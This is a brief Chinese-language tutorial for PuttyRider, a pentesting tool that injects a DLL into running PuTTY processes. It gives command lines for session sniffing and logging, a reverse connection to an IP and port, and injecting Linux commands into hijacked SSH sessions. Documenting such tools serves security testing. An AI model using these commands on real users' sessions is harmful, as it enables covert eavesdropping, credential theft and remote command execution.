PuttyRider 使用教程

1. 项目介绍

PuttyRider 是一个开源项目，它允许用户劫持 Putty 会话，以便嗅探会话中的对话内容，并且能够在被劫持的会话中注入 Linux 命令。这个工具对于安全测试人员来说非常有用，可以帮助他们理解会话的内容并进行相应的安全评估。

2. 项目快速启动

环境准备

• Visual Studio Command Prompt
• PuttyRider 源码（从 GitHub 下载）

编译

使用 Visual Studio Command Prompt 打开 PuttyRider 源码目录，执行以下命令编译：

nmake main dll

使用方法

编译成功后，可以得到 PuttyRider.exe 和 PuttyRider.dll 文件。以下是一些基本的使用方法：

• 列出当前运行的 Putty 进程及其连接状态：

PuttyRider.exe -l

• 将 DLL 注入到第一个找到的 putty.exe 进程，并从 DLL 到指定 IP:Port 启动反向连接：

PuttyRider.exe -p 0 -r 192.168.0.55:8080

• 在后台运行，等待新的 Putty 进程。注入任何新的 putty.exe 并将所有对话写入本地文件：

PuttyRider.exe -w -f

• 从所有已注入的 Putty 进程中移除 PuttyRider.dll：

PuttyRider.exe -x

3. 应用案例和最佳实践

嗅探会话

对于安全测试人员，使用 -w -f 参数启动 PuttyRider，可以记录所有 Putty 会话，这有助于分析会话中可能存在的不安全操作。

注入命令

使用 -p 参数指定 Putty 进程 ID，然后使用 -c 参数可以自动执行一个 Linux 命令，例如：

PuttyRider.exe -p 1234 -c "ls -l"

这会在指定的 Putty 会话中执行 ls -l 命令。

4. 典型生态项目

PuttyRider 可以与一些安全测试工具配合使用，例如：

• Metasploit：用于进行安全渗透测试的框架。
• Wireshark：用于网络流量分析的工具。

通过将这些工具与 PuttyRider 结合使用，安全专家可以获得更全面的安全评估。